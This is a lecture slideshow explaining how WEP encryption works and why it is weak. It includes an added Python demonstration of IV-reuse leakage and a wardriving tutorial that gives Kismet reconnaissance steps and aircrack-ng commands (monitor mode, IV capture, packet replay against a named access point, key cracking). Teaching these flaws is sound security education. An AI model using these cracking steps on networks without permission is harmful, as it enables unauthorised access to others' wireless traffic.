Slideshow: The Trouble with WEP

The Trouble with WEP
Or, cracking WiFi networks for fun & profit (not really)
Overview

- Background and a little history
- How WEP works
- WEP's major weaknesses
- A short course in wardriving
  - Using Kismet to scout out the wireless landscape
  - Zeroing in with the aircrack-ng suite
    - airodump, to capture traffic
    - aireplay, to replay weakly encrypted packets
    - aircrack, to find the key using statistical methods
Background & history

- Wireless Equivalent Privacy
- Adopted in 1999 as part of the 802.11 standard
- Later swallowed whole by the 802.11b standard
- Initially used only 40-bit encryption keys, due to technology export restrictions
- Later expanded to 104-bit keys when the export restrictions were eased
- Used 6 times as often as WPA/WPA2 despite a known fatal weakness* (85% / 14% / 1%)

*Based on a 2006 survey in the Seattle area
How WEP works

1. Plain text gets a CRC-32 checksum appended
2. A 24-bit initialization vector (IV) is pre-pended to the key as the seed for the RC4 key scheduling algorithm
3. RC4's pseudo-random generation algorithm outputs the keystream
4. Keystream is XORed with the plain text
5. The IV, in plain text, is pre-pended to the message
6. On receipt, the keystream is regenerated and XORed with the cipher text to produce the plain text
WEP's major weaknesses

- IV space too small (2^24)
  - On a busy network, IVs must repeat within <= 5 hours
  - 50% probability that an IV repeats within 5,000 packets
- RC4 algorithm produces "weak" IVs that can be correctly guessed 5% or 13% of the time
- No key management; typically just one key
- IP traffic contains much known plaintext data
- Open to injected traffic that is rebroadcast
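The six steps above and the IV-reuse weakness, worked through as an added illustration (this is not code from the slides): a minimal WEP-style encapsulation using RC4, with a constructed 40-bit key, IV and two HTTP-like payloads, showing that two frames sharing one IV share one keystream and therefore leak the XOR of their plaintexts.

```python
import struct
import zlib

def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4: key scheduling (KSA) followed by pseudo-random generation (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA, seeded with IV || key
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):                    # PRGA emits the keystream
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Steps 1-5: append CRC-32 (ICV), seed RC4 with IV||key, XOR, prepend IV."""
    assert len(iv) == 3 and len(key) in (5, 13)  # 24-bit IV; 40- or 104-bit key
    data = plaintext + struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + xor(data, rc4_keystream(iv + key, len(data)))

def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Step 6: regenerate the keystream from the cleartext IV, XOR, check the ICV."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4_keystream(iv + key, len(body)))
    plaintext, icv = data[:-4], data[-4:]
    if struct.unpack("<I", icv)[0] != (zlib.crc32(plaintext) & 0xFFFFFFFF):
        raise ValueError("ICV mismatch: frame corrupted or wrong key")
    return plaintext

def iv_reuse_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under one IV share a keystream, so C1 XOR C2 = P1 XOR P2."""
    assert frame_a[:3] == frame_b[:3], "demo needs a repeated IV"
    return xor(frame_a[3:], frame_b[3:])

# Constructed sample values (not taken from any real network).
KEY = b"\x01\x02\x03\x04\x05"                  # 40-bit WEP key
IV = b"\xaa\xbb\xcc"                           # 24-bit IV, sent in the clear
P1 = b"GET /index.html HTTP/1.0\r\n"           # known-plaintext style payload
P2 = b"POST /login.php HTTP/1.1\r\n"           # same length, same IV reused
FRAME1 = wep_encrypt(KEY, IV, P1)
FRAME2 = wep_encrypt(KEY, IV, P2)
```

Because the leak equals P1 XOR P2, any byte of one payload that is known (the "much known plaintext" in IP traffic) immediately reveals the corresponding byte of the other without touching the key.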
Wardriving: Kismet

- Network detector, sniffer, IDS
- Works on 802.11b, 802.11a, 802.11g networks
- Uses passive monitoring, so hard to detect
- Logs sniffed packets in formats compatible with Wireshark/Tcpdump, Airsnort
- Channel surfs automatically
- Optionally, supports GPS for network location
Kismet: Install & configure

- Binary packages available for most systems
- Requires a WiFi adaptor that supports monitor mode as the "capture source"
- Logs traffic in popular formats*
- Specify the source in /etc/kismet/kismet.conf, as driver,device,source_name:
  source=ipw2200,eth1,Stella

*Wireshark, Airsnort, etc.

Stella, the WiFi attack animal!
Wardriving: Recon phase

- Use Kismet to survey the WiFi landscape and to choose a target network
- Record the necessary data for the Aircrack attack:
  - Channel number?
  - SSID?
  - Access point MAC address?
Wardriving: Kismet
Wardriving: Attack phase

- Aircrack-ng: Software for network detection, sniffing, WEP cracking, and analysis
- Works on 802.11b, 802.11a, 802.11g
- Uses passive monitoring & packet injection
- Main tools
  - aircrack-ng: Cracking
  - airdecap: Packet decryption
  - airmon: Monitor mode switching
  - aireplay: Packet injection (Linux only)
  - airodump: Exports traffic to .cap files
Wardriving: Aircrack procedure

1. Bring up the adapter on the target's channel in monitor mode:
   # ifconfig wlan0 up
   # iwconfig wlan0 mode Monitor channel 9
2. Capture packets on that channel to a file, IVs only:
   # airodump wlan0 ./berlin_dump 9 1
Wardriving: Airodump
Wardriving: Aircrack procedure

3. Find weakly-encrypted packets to replay, in interactive mode:
   # aireplay -2 -b 00:14:6C:40:BA:A6 -x 512 wlan0
4. Finally, crack the WEP key with the captured IVs:
   # aircrack -n 64 berlin-dump.ivs
Wardriving: Aireplay
Wardriving: Aircrack
Summary

- WEP has numerous serious flaws
- WEP's flaws are thoroughly documented
- WEP is readily exploitable in a short time, by unskilled attackers, using readily available tools
- Strong protection is readily available

Bottom line: Don't use WEP, period!

Questions?